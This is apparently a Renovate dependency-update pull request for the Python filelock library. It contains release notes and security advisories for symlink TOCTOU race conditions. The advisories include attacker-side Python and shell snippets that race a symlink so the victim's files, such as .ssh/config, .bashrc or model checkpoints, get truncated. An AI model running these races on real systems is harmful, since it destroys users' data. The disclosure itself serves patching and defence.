gracefully degrades on platforms without support - On platforms with `O_NOFOLLOW` support (most modern systems): symlink attacks are completely prevented - On platforms without `O_NOFOLLOW` (e.g., GraalPy): TOCTOU window remains but is documented **Users should:** - Upgrade to the patched version when available - For critical deployments, consider using `UnixFileLock` or `WindowsFileLock` instead of the fallback `SoftFileLock` --- ##### Workarounds _Is there a way for users to fix or remediate the vulnerability without upgrading?_ For users unable to update immediately: 1. **Avoid `SoftFileLock` in security-sensitive contexts** - use `UnixFileLock` or `WindowsFileLock` when available (these were already patched for CVE-2025-68146) 2. **Restrict filesystem permissions** - prevent untrusted users from creating symlinks in lock file directories: ```bash chmod 700 /path/to/lock/directory ``` 3. **Use process isolation** - isolate untrusted code from lock file paths to prevent symlink creation 4. **Monitor lock operations** - implement application-level checks to verify lock acquisitions are successful before proceeding with critical operations --- ##### References _Are there any links users can visit to find out more?_ - **Similar Vulnerability:** CVE-2025-68146 (TOCTOU vulnerability in UnixFileLock/WindowsFileLock) - **CWE-362 (Concurrent Execution using Shared Resource):** https://cwe.mitre.org/data/definitions/362.html - **CWE-367 (Time-of-check Time-of-use Race Condition):** https://cwe.mitre.org/data/definitions/367.html - **CWE-59 (Improper Link Resolution Before File Access):** https://cwe.mitre.org/data/definitions/59.html - **O_NOFOLLOW documentation:** https://man7.org/linux/man-pages/man2/open.2.html - **GitHub Repository:** https://github.com/tox-dev/filelock --- **Reported by:** George Tsigourakos (@​tsigouris007) #### Severity - CVSS Score: 5.3 / 10 (Medium) - Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:H` #### References - [https://github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-qmgc-5h2g-mvrw) - [https://nvd.nist.gov/vuln/detail/CVE-2026-22701](https://nvd.nist.gov/vuln/detail/CVE-2026-22701) - [https://github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0](https://redirect.github.com/tox-dev/filelock/commit/255ed068bc85d1ef406e50a135e1459170dd1bf0) - [https://github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5](https://redirect.github.com/tox-dev/filelock/commit/41b42dd2c72aecf7da83dbda5903b8087dddc4d5) - [https://github.com/tox-dev/filelock](https://redirect.github.com/tox-dev/filelock) - [https://pypi.org/project/filelock](https://pypi.org/project/filelock) - [https://github.com/advisories/GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/advisories/GHSA-qmgc-5h2g-mvrw) This data is provided by [OSV](https://osv.dev/vulnerability/PYSEC-2026-1374) and the [PyPI Advisory Database](https://redirect.github.com/pypa/advisory-database) ([CC-BY 4.0](https://redirect.github.com/pypa/advisory-database/blob/main/LICENSE)). </details> --- ### Release Notes <details> <summary>tox-dev/py-filelock (filelock)</summary> ### [`v3.30.0`](https://redirect.github.com/tox-dev/filelock/releases/tag/3.30.0) [Compare Source](https://redirect.github.com/tox-dev/py-filelock/compare/3.29.7...3.30.0) <!-- Release notes generated using configuration in .github/release.yaml at 3.30.0 --> #### What's Changed - 🎨 style: readability cleanup across the library by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#598](https://redirect.github.com/tox-dev/filelock/pull/598) - 🐛 fix(api): ignore lifetime on native OS locks by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#593](https://redirect.github.com/tox-dev/filelock/pull/593) - 🐛 fix(unix): don't mutate lock file before acquiring flock by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#594](https://redirect.github.com/tox-dev/filelock/pull/594) - soft: evict a non-regular lock file without reading it by [@​dxbjavid](https://redirect.github.com/dxbjavid) in [tox-dev/filelock#597](https://redirect.github.com/tox-dev/filelock/pull/597) - 🐛 fix(windows): bind reparse-point check to the locked handle by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#596](https://redirect.github.com/tox-dev/filelock/pull/596) - 🐛 fix(api): make native lock release transactional by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#615](https://redirect.github.com/tox-dev/filelock/pull/615) - 🐛 fix(soft): make marker writes and cleanup transactional by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#614](https://redirect.github.com/tox-dev/filelock/pull/614) - 🐛 fix(windows): open the lock file through NtCreateFile by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#617](https://redirect.github.com/tox-dev/filelock/pull/617) - ✨ feat(api): add context\_error\_policy for dual context failures by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#618](https://redirect.github.com/tox-dev/filelock/pull/618) - 📝 docs: correct Unix lock-file cleanup and flock claims by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#623](https://redirect.github.com/tox-dev/filelock/pull/623) - ✨ feat(api): add close\_error\_policy for post-unlock close errors by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#619](https://redirect.github.com/tox-dev/filelock/pull/619) - 🐛 fix(api): canonicalize singleton keys without following a final symlink by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#621](https://redirect.github.com/tox-dev/filelock/pull/621) - ✨ feat(unix): add fallback\_to\_soft opt-out for native locks by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#622](https://redirect.github.com/tox-dev/filelock/pull/622) - ✨ feat: add lock\_descriptor for a caller-owned descriptor by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#620](https://redirect.github.com/tox-dev/filelock/pull/620) - ✨ feat(api): add preserve\_lock\_file to keep the lock pathname by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#624](https://redirect.github.com/tox-dev/filelock/pull/624) - ✨ feat(api): add on\_acquired post-acquisition hook by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#625](https://redirect.github.com/tox-dev/filelock/pull/625) - 🔧 build(release): towncrier changelog pipeline, backfill, and docs by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#626](https://redirect.github.com/tox-dev/filelock/pull/626) - 📝 docs: drop bot entries and link code refs in the changelog by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#638](https://redirect.github.com/tox-dev/filelock/pull/638) - 🐛 fix(api): validate lifetime values by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#644](https://redirect.github.com/tox-dev/filelock/pull/644) - 🐛 fix(win32): capture process probe errors by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#645](https://redirect.github.com/tox-dev/filelock/pull/645) - 🐛 fix(api): reject dropped lock options by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#646](https://redirect.github.com/tox-dev/filelock/pull/646) - 🐛 fix(api): retain acquisition path identity by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#647](https://redirect.github.com/tox-dev/filelock/pull/647) - 🐛 fix(api): detach grouped release errors by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#648](https://redirect.github.com/tox-dev/filelock/pull/648) - 🐛 fix(descriptor): define unavailable behavior by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#650](https://redirect.github.com/tox-dev/filelock/pull/650) - 🐛 fix(ci): map absolute coverage paths by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#651](https://redirect.github.com/tox-dev/filelock/pull/651) - 🐛 fix(soft): relinquish fd before close by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#649](https://redirect.github.com/tox-dev/filelock/pull/649) - 🐛 fix(async): make cancellation atomic by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#652](https://redirect.github.com/tox-dev/filelock/pull/652) - 🐛 fix(sqlite): isolate forked connections by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#657](https://redirect.github.com/tox-dev/filelock/pull/657) - 🧪 test(conftest): scope the close mock to one descriptor by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#656](https://redirect.github.com/tox-dev/filelock/pull/656) - ✨ feat(soft): add strict soft locks and leases by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#658](https://redirect.github.com/tox-dev/filelock/pull/658) - ✨ feat(strict): replace shared markers with owner claims by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#659](https://redirect.github.com/tox-dev/filelock/pull/659) - 🐛 fix(soft): detect a reused PID via process start time by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#660](https://redirect.github.com/tox-dev/filelock/pull/660) - 🔒 fix(soft): fail safe on transient heartbeat errors by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#661](https://redirect.github.com/tox-dev/filelock/pull/661) - 📝 docs: state the lock trust boundaries once by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#663](https://redirect.github.com/tox-dev/filelock/pull/663) - 👷 ci(perf): add the performance and NFS matrix by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#664](https://redirect.github.com/tox-dev/filelock/pull/664) - Replace prettier with mdformat and yamlfmt by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#667](https://redirect.github.com/tox-dev/filelock/pull/667) - 👷 ci(matrix): add SMB, capability, and matrix docs by [@​gaborbernat](https://redirect.github.com/gaborbernat) in [tox-dev/filelock#665](https://redirect.github.com/tox-dev/filelock/pull/665) **Full Changelog**: <tox-dev/filelock@3.29.7...3.30.0> </details> --- ### Configuration 📅 **Schedule**: (UTC) - Branch creation - At any time (no schedule defined) - Automerge - At any time (no schedule defined) 🚦 **Automerge**: Enabled. ♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox. 🔕 **Ignore**: Close this PR and you won't be reminded about this update again. --- - [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check this box --- This PR has been generated by [Mend Renovate](https://redirect.github.com/renovatebot/renovate). <!--renovate-debug:eyJjcmVhdGVkSW5WZXIiOiI0My4yMjQuMSIsInVwZGF0ZWRJblZlciI6IjQzLjIyNC4xIiwidGFyZ2V0QnJhbmNoIjoibWFpbiIsImxhYmVscyI6WyJkZXBlbmRlbmNpZXMiLCJmaWxlbG9jayIsInJlbm92YXRlIl19--> Co-authored-by: renovate-coop-norge[bot] <151545514+renovate-coop-norge[bot]@users.noreply.github.com>
renovate-coop-norge Bot
added a commit
to coopnorge/engineering-docker-images
that referenced
this pull request
Jul 16, 2026
This PR contains the following updates: | Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) | |---|---|---|---| | [filelock](https://redirect.github.com/tox-dev/py-filelock) | `3.29.7` → `3.30.0` |  |  | --- ### filelock has a TOCTOU race condition which allows symlink attacks during lock file creation [CVE-2025-68146](https://nvd.nist.gov/vuln/detail/CVE-2025-68146) / [GHSA-w853-jp5j-5j7f](https://redirect.github.com/advisories/GHSA-w853-jp5j-5j7f) / PYSEC-2026-1375 <details> <summary>More information</summary> #### Details ##### Impact A Time-of-Check-Time-of-Use (TOCTOU) race condition allows local attackers to corrupt or truncate arbitrary user files through symlink attacks. The vulnerability exists in both Unix and Windows lock file creation where filelock checks if a file exists before opening it with O_TRUNC. An attacker can create a symlink pointing to a victim file in the time gap between the check and open, causing os.open() to follow the symlink and truncate the target file. **Who is impacted:** All users of filelock on Unix, Linux, macOS, and Windows systems. The vulnerability cascades to dependent libraries: - **virtualenv users**: Configuration files can be overwritten with virtualenv metadata, leaking sensitive paths - **PyTorch users**: CPU ISA cache or model checkpoints can be corrupted, causing crashes or ML pipeline failures - **poetry/tox users**: through using virtualenv or filelock on their own. Attack requires local filesystem access and ability to create symlinks (standard user permissions on Unix; Developer Mode on Windows 10+). Exploitation succeeds within 1-3 attempts when lock file paths are predictable. ##### Patches Fixed in version **3.20.1**. **Unix/Linux/macOS fix:** Added O_NOFOLLOW flag to os.open() in UnixFileLock.\_acquire() to prevent symlink following. **Windows fix:** Added GetFileAttributesW API check to detect reparse points (symlinks/junctions) before opening files in WindowsFileLock.\_acquire(). **Users should upgrade to filelock 3.20.1 or later immediately.** ##### Workarounds If immediate upgrade is not possible: 1. Use SoftFileLock instead of UnixFileLock/WindowsFileLock (note: different locking semantics, may not be suitable for all use cases) 2. Ensure lock file directories have restrictive permissions (chmod 0700) to prevent untrusted users from creating symlinks 3. Monitor lock file directories for suspicious symlinks before running trusted applications **Warning:** These workarounds provide only partial mitigation. The race condition remains exploitable. Upgrading to version 3.20.1 is strongly recommended. ______________________________________________________________________ ##### Technical Details: How the Exploit Works ##### The Vulnerable Code Pattern **Unix/Linux/macOS** (`src/filelock/_unix.py:39-44`): ```python def _acquire(self) -> None: ensure_directory_exists(self.lock_file) open_flags = os.O_RDWR | os.O_TRUNC # (1) Prepare to truncate if not Path(self.lock_file).exists(): # (2) CHECK: Does file exist? open_flags |= os.O_CREAT fd = os.open(self.lock_file, open_flags, ...) # (3) USE: Open and truncate ``` **Windows** (`src/filelock/_windows.py:19-28`): ```python def _acquire(self) -> None: raise_on_not_writable_file(self.lock_file) # (1) Check writability ensure_directory_exists(self.lock_file) flags = os.O_RDWR | os.O_CREAT | os.O_TRUNC # (2) Prepare to truncate fd = os.open(self.lock_file, flags, ...) # (3) Open and truncate ``` ##### The Race Window The vulnerability exists in the gap between operations: **Unix variant:** ``` Time Victim Thread Attacker Thread ---- ------------- --------------- T0 Check: lock_file exists? → False T1 ↓ RACE WINDOW T2 Create symlink: lock → victim_file T3 Open lock_file with O_TRUNC → Follows symlink → Opens victim_file → Truncates victim_file to 0 bytes! ☠️ ``` **Windows variant:** ``` Time Victim Thread Attacker Thread ---- ------------- --------------- T0 Check: lock_file writable? T1 ↓ RACE WINDOW T2 Create symlink: lock → victim_file T3 Open lock_file with O_TRUNC → Follows symlink/junction → Opens victim_file → Truncates victim_file to 0 bytes! ☠️ ``` ##### Step-by-Step Attack Flow **1. Attacker Setup:** ```python ##### Attacker identifies target application using filelock lock_path = "/tmp/myapp.lock" # Predictable lock path victim_file = "/home/victim/.ssh/config" # High-value target ``` **2. Attacker Creates Race Condition:** ```python import os import threading def attacker_thread(): # Remove any existing lock file try: os.unlink(lock_path) except FileNotFoundError: pass # Create symlink pointing to victim file os.symlink(victim_file, lock_path) print(f"[Attacker] Created: {lock_path} → {victim_file}") ##### Launch attack threading.Thread(target=attacker_thread).start() ``` **3. Victim Application Runs:** ```python from filelock import UnixFileLock ##### Normal application code lock = UnixFileLock("/tmp/myapp.lock") lock.acquire() # ← VULNERABILITY TRIGGERED HERE ##### At this point, /home/victim/.ssh/config is now 0 bytes! ``` **4. What Happens Inside os.open():** On Unix systems, when `os.open()` is called: ```c // Linux kernel behavior (simplified) int open(const char *pathname, int flags) { struct file *f = path_lookup(pathname); // Resolves symlinks by default! if (flags & O_TRUNC) { truncate_file(f); // ← Truncates the TARGET of the symlink } return file_descriptor; } ``` Without `O_NOFOLLOW` flag, the kernel follows the symlink and truncates the target file. ##### Why the Attack Succeeds Reliably **Timing Characteristics:** - **Check operation** (Path.exists()): ~100-500 nanoseconds - **Symlink creation** (os.symlink()): ~1-10 microseconds - **Race window**: ~1-5 microseconds (very small but exploitable) - **Thread scheduling quantum**: ~1-10 milliseconds **Success factors:** 1. **Tight loop**: Running attack in a loop hits the race window within 1-3 attempts 2. **CPU scheduling**: Modern OS thread schedulers frequently context-switch during I/O operations 3. **No synchronization**: No atomic file creation prevents the race 4. **Symlink speed**: Creating symlinks is extremely fast (metadata-only operation) ##### Real-World Attack Scenarios **Scenario 1: virtualenv Exploitation** ```python ##### Victim runs: python -m venv /tmp/myenv ##### Attacker racing to create: os.symlink("/home/victim/.bashrc", "/tmp/myenv/pyvenv.cfg") ##### Result: /home/victim/.bashrc overwritten with: ##### home = /usr/bin/python3 ##### include-system-site-packages = false ##### version = 3.11.2 ##### ← Original .bashrc contents LOST + virtualenv metadata LEAKED to attacker ``` **Scenario 2: PyTorch Cache Poisoning** ```python ##### Victim runs: import torch ##### PyTorch checks CPU capabilities, uses filelock on cache ##### Attacker racing to create: os.symlink("/home/victim/.torch/compiled_model.pt", "/home/victim/.cache/torch/cpu_isa_check.lock") ##### Result: Trained ML model checkpoint truncated to 0 bytes ##### Impact: Weeks of training lost, ML pipeline DoS ``` ##### Why Standard Defenses Don't Help **File permissions don't prevent this:** - Attacker doesn't need write access to victim_file - os.open() with O_TRUNC follows symlinks using the *victim's* permissions - The victim process truncates its own file **Directory permissions help but aren't always feasible:** - Lock files often created in shared /tmp directory (mode 1777) - Applications may not control lock file location - Many apps use predictable paths in user-writable directories **File locking doesn't prevent this:** - The truncation happens *during* the open() call, before any lock is acquired - fcntl.flock() only prevents concurrent lock acquisition, not symlink attacks ##### Exploitation Proof-of-Concept Results From empirical testing with the provided PoCs: **Simple Direct Attack** (`filelock_simple_poc.py`): - Success rate: 33% per attempt (1 in 3 tries) - Average attempts to success: 2.1 - Target file reduced to 0 bytes in \<100ms **virtualenv Attack** (`weaponized_virtualenv.py`): - Success rate: ~90% on first attempt (deterministic timing) - Information leaked: File paths, Python version, system configuration - Data corruption: Complete loss of original file contents **PyTorch Attack** (`weaponized_pytorch.py`): - Success rate: 25-40% per attempt - Impact: Application crashes, model loading failures - Recovery: Requires cache rebuild or model retraining **Discovered and reported by:** George Tsigourakos (@​tsigouris007) #### Severity - CVSS Score: 6.3 / 10 (Medium) - Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H` #### References - [https://github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f) - [https://github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e](https://redirect.github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e) - [https://github.com/tox-dev/filelock](https://redirect.github.com/tox-dev/filelock) - [https://github.com/tox-dev/filelock/releases/tag/3.20.1](https://redirect.github.com/tox-dev/filelock/releases/tag/3.20.1) - [https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants](https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants) - [https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html](https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html) This data is provided by [OSV](https://osv.dev/vulnerability/GHSA-w853-jp5j-5j7f) and the [GitHub Advisory Database](https://redirect.github.com/github/advisory-database) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### filelock has a TOCTOU race condition which allows symlink attacks during lock file creation [CVE-2025-68146](https://nvd.nist.gov/vuln/detail/CVE-2025-68146) / [GHSA-w853-jp5j-5j7f](https://redirect.github.com/advisories/GHSA-w853-jp5j-5j7f) / PYSEC-2026-1375 <details> <summary>More information</summary> #### Details ##### Impact A Time-of-Check-Time-of-Use (TOCTOU) race condition allows local attackers to corrupt or truncate arbitrary user files through symlink attacks. The vulnerability exists in both Unix and Windows lock file creation where filelock checks if a file exists before opening it with O_TRUNC. An attacker can create a symlink pointing to a victim file in the time gap between the check and open, causing os.open() to follow the symlink and truncate the target file. **Who is impacted:** All users of filelock on Unix, Linux, macOS, and Windows systems. The vulnerability cascades to dependent libraries: - **virtualenv users**: Configuration files can be overwritten with virtualenv metadata, leaking sensitive paths - **PyTorch users**: CPU ISA cache or model checkpoints can be corrupted, causing crashes or ML pipeline failures - **poetry/tox users**: through using virtualenv or filelock on their own. Attack requires local filesystem access and ability to create symlinks (standard user permissions on Unix; Developer Mode on Windows 10+). Exploitation succeeds within 1-3 attempts when lock file paths are predictable. ##### Patches Fixed in version **3.20.1**. **Unix/Linux/macOS fix:** Added O_NOFOLLOW flag to os.open() in UnixFileLock.\_acquire() to prevent symlink following. **Windows fix:** Added GetFileAttributesW API check to detect reparse points (symlinks/junctions) before opening files in WindowsFileLock.\_acquire(). **Users should upgrade to filelock 3.20.1 or later immediately.** ##### Workarounds If immediate upgrade is not possible: 1. Use SoftFileLock instead of UnixFileLock/WindowsFileLock (note: different locking semantics, may not be suitable for all use cases) 2. Ensure lock file directories have restrictive permissions (chmod 0700) to prevent untrusted users from creating symlinks 3. Monitor lock file directories for suspicious symlinks before running trusted applications **Warning:** These workarounds provide only partial mitigation. The race condition remains exploitable. Upgrading to version 3.20.1 is strongly recommended. ______________________________________________________________________ ##### Technical Details: How the Exploit Works ##### The Vulnerable Code Pattern **Unix/Linux/macOS** (`src/filelock/_unix.py:39-44`): ```python def _acquire(self) -> None: ensure_directory_exists(self.lock_file) open_flags = os.O_RDWR | os.O_TRUNC # (1) Prepare to truncate if not Path(self.lock_file).exists(): # (2) CHECK: Does file exist? open_flags |= os.O_CREAT fd = os.open(self.lock_file, open_flags, ...) # (3) USE: Open and truncate ``` **Windows** (`src/filelock/_windows.py:19-28`): ```python def _acquire(self) -> None: raise_on_not_writable_file(self.lock_file) # (1) Check writability ensure_directory_exists(self.lock_file) flags = os.O_RDWR | os.O_CREAT | os.O_TRUNC # (2) Prepare to truncate fd = os.open(self.lock_file, flags, ...) # (3) Open and truncate ``` ##### The Race Window The vulnerability exists in the gap between operations: **Unix variant:** ``` Time Victim Thread Attacker Thread ---- ------------- --------------- T0 Check: lock_file exists? → False T1 ↓ RACE WINDOW T2 Create symlink: lock → victim_file T3 Open lock_file with O_TRUNC → Follows symlink → Opens victim_file → Truncates victim_file to 0 bytes! ☠️ ``` **Windows variant:** ``` Time Victim Thread Attacker Thread ---- ------------- --------------- T0 Check: lock_file writable? T1 ↓ RACE WINDOW T2 Create symlink: lock → victim_file T3 Open lock_file with O_TRUNC → Follows symlink/junction → Opens victim_file → Truncates victim_file to 0 bytes! ☠️ ``` ##### Step-by-Step Attack Flow **1. Attacker Setup:** ```python ##### Attacker identifies target application using filelock lock_path = "/tmp/myapp.lock" # Predictable lock path victim_file = "/home/victim/.ssh/config" # High-value target ``` **2. Attacker Creates Race Condition:** ```python import os import threading def attacker_thread(): # Remove any existing lock file try: os.unlink(lock_path) except FileNotFoundError: pass # Create symlink pointing to victim file os.symlink(victim_file, lock_path) print(f"[Attacker] Created: {lock_path} → {victim_file}") ##### Launch attack threading.Thread(target=attacker_thread).start() ``` **3. Victim Application Runs:** ```python from filelock import UnixFileLock ##### Normal application code lock = UnixFileLock("/tmp/myapp.lock") lock.acquire() # ← VULNERABILITY TRIGGERED HERE ##### At this point, /home/victim/.ssh/config is now 0 bytes! ``` **4. What Happens Inside os.open():** On Unix systems, when `os.open()` is called: ```c // Linux kernel behavior (simplified) int open(const char *pathname, int flags) { struct file *f = path_lookup(pathname); // Resolves symlinks by default! if (flags & O_TRUNC) { truncate_file(f); // ← Truncates the TARGET of the symlink } return file_descriptor; } ``` Without `O_NOFOLLOW` flag, the kernel follows the symlink and truncates the target file. ##### Why the Attack Succeeds Reliably **Timing Characteristics:** - **Check operation** (Path.exists()): ~100-500 nanoseconds - **Symlink creation** (os.symlink()): ~1-10 microseconds - **Race window**: ~1-5 microseconds (very small but exploitable) - **Thread scheduling quantum**: ~1-10 milliseconds **Success factors:** 1. **Tight loop**: Running attack in a loop hits the race window within 1-3 attempts 2. **CPU scheduling**: Modern OS thread schedulers frequently context-switch during I/O operations 3. **No synchronization**: No atomic file creation prevents the race 4. **Symlink speed**: Creating symlinks is extremely fast (metadata-only operation) ##### Real-World Attack Scenarios **Scenario 1: virtualenv Exploitation** ```python ##### Victim runs: python -m venv /tmp/myenv ##### Attacker racing to create: os.symlink("/home/victim/.bashrc", "/tmp/myenv/pyvenv.cfg") ##### Result: /home/victim/.bashrc overwritten with: ##### home = /usr/bin/python3 ##### include-system-site-packages = false ##### version = 3.11.2 ##### ← Original .bashrc contents LOST + virtualenv metadata LEAKED to attacker ``` **Scenario 2: PyTorch Cache Poisoning** ```python ##### Victim runs: import torch ##### PyTorch checks CPU capabilities, uses filelock on cache ##### Attacker racing to create: os.symlink("/home/victim/.torch/compiled_model.pt", "/home/victim/.cache/torch/cpu_isa_check.lock") ##### Result: Trained ML model checkpoint truncated to 0 bytes ##### Impact: Weeks of training lost, ML pipeline DoS ``` ##### Why Standard Defenses Don't Help **File permissions don't prevent this:** - Attacker doesn't need write access to victim_file - os.open() with O_TRUNC follows symlinks using the *victim's* permissions - The victim process truncates its own file **Directory permissions help but aren't always feasible:** - Lock files often created in shared /tmp directory (mode 1777) - Applications may not control lock file location - Many apps use predictable paths in user-writable directories **File locking doesn't prevent this:** - The truncation happens *during* the open() call, before any lock is acquired - fcntl.flock() only prevents concurrent lock acquisition, not symlink attacks ##### Exploitation Proof-of-Concept Results From empirical testing with the provided PoCs: **Simple Direct Attack** (`filelock_simple_poc.py`): - Success rate: 33% per attempt (1 in 3 tries) - Average attempts to success: 2.1 - Target file reduced to 0 bytes in \<100ms **virtualenv Attack** (`weaponized_virtualenv.py`): - Success rate: ~90% on first attempt (deterministic timing) - Information leaked: File paths, Python version, system configuration - Data corruption: Complete loss of original file contents **PyTorch Attack** (`weaponized_pytorch.py`): - Success rate: 25-40% per attempt - Impact: Application crashes, model loading failures - Recovery: Requires cache rebuild or model retraining **Discovered and reported by:** George Tsigourakos (@​tsigouris007) #### Severity - CVSS Score: 6.3 / 10 (Medium) - Vector String: `CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H` #### References - [https://github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f](https://redirect.github.com/tox-dev/filelock/security/advisories/GHSA-w853-jp5j-5j7f) - [https://github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e](https://redirect.github.com/tox-dev/filelock/commit/4724d7f8c3393ec1f048c93933e6e3e6ec321f0e) - [https://github.com/tox-dev/filelock](https://redirect.github.com/tox-dev/filelock) - [https://github.com/tox-dev/filelock/releases/tag/3.20.1](https://redirect.github.com/tox-dev/filelock/releases/tag/3.20.1) - [https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants](https://learn.microsoft.com/en-us/windows/win32/fileio/file-attribute-constants) - [https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html](https://pubs.opengroup.org/onlinepubs/9699919799/functions/open.html) - [https://pypi.org/project/filelock](https://pypi.org/project/filelock) - [https://github.com/advisories/GHSA-w853-jp5j-5j7f](https://redirect.github.com/advisories/GHSA-w853-jp5j-5j7f) - [https://nvd.nist.gov/vuln/detail/CVE-2025-68146](https://nvd.nist.gov/vuln/detail/CVE-2025-68146) This data is provided by [OSV](https://osv.dev/vulnerability/PYSEC-2026-1375) and the [PyPI Advisory Database](https://redirect.github.com/pypa/advisory-database) ([CC-BY 4.0](https://redirect.github.com/pypa/advisory-database/blob/main/LICENSE)). </details> --- ### filelock Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock [CVE-2026-22701](https://nvd.nist.gov/vuln/detail/CVE-2026-22701) / [GHSA-qmgc-5h2g-mvrw](https://redirect.github.com/advisories/GHSA-qmgc-5h2g-mvrw) / PYSEC-2026-1374 <details> <summary>More information</summary> #### Details ##### Vulnerability Summary **Title:** Time-of-Check-Time-of-Use (TOCTOU) Symlink Vulnerability in SoftFileLock **Affected Component:** `filelock` package - `SoftFileLock` class **File:** `src/filelock/_soft.py` lines 17-27 **CWE:** CWE-362, CWE-367, CWE-59 --- ##### Description A TOCTOU race condition vulnerability exists in the `SoftFileLock` implementation of the filelock package. An attacker with local filesystem access and permission to create symlinks can exploit a race condition between the permission validation and file creation to cause lock operations to fail or behave unexpectedly. The vulnerability occurs in the `_acquire()` method between `raise_on_not_writable_file()` (permission check) and `os.open()` (file creation). During this race window, an attacker can create a symlink at the lock file path, potentially causing the lock to operate on an unintended target file or leading to denial of service. ##### Attack Scenario ``` 1. Lock attempts to acquire on /tmp/app.lock 2. Permission validation passes 3. [RACE WINDOW] - Attacker creates: ln -s /tmp/important.txt /tmp/app.lock 4. os.open() tries to create lock file 5. Lock operates on attacker-controlled target file or fails ``` --- ##### Impact _What kind of vulnerability is it? Who is impacted?_ This is a **Time-of-Check-Time-of-Use (TOCTOU) race condition vulnerability** affecting any application using `SoftFileLock` for inter-process synchronization. **Affected Users:** - Applications using `filelock.SoftFileLock` directly - Applications using the fallback `FileLock` on systems without `fcntl` support (e.g., GraalPy) **Consequences:** - **Silent lock acquisition failure** - applications may not detect that exclusive resource access is not guaranteed - **Denial of Service** - attacker can prevent lock file creation by maintaining symlink - **Resource serialization failures** - multiple processes may acquire "locks" simultaneously - **Unintended file operations** - lock could operate on attacker-controlled files **CVSS v4.0 Score:** 5.6 (Medium) **Vector:** CVSS:4.0/AV:L/AT:L/PR:L/UI:N/VC:N/VI:L/VA:H/SC:N/SI:N/SA:N **Attack Requirements:** - Local filesystem access to the directory containing lock files - Permission to create symlinks (standard for regular unprivileged users on Unix/Linux) - Ability to time the symlink creation during the narrow race window --- ##### Patches _Has the problem been patched? What versions should users upgrade to?_ Yes, the vulnerability has been patched by adding the `O_NOFOLLOW` flag to prevent symlink following during lock file creation. **Patched Version:** Next release (commit: 255ed068bc85d1ef406e50a135e1459170dd1bf0) **Mitigation Details:** - The 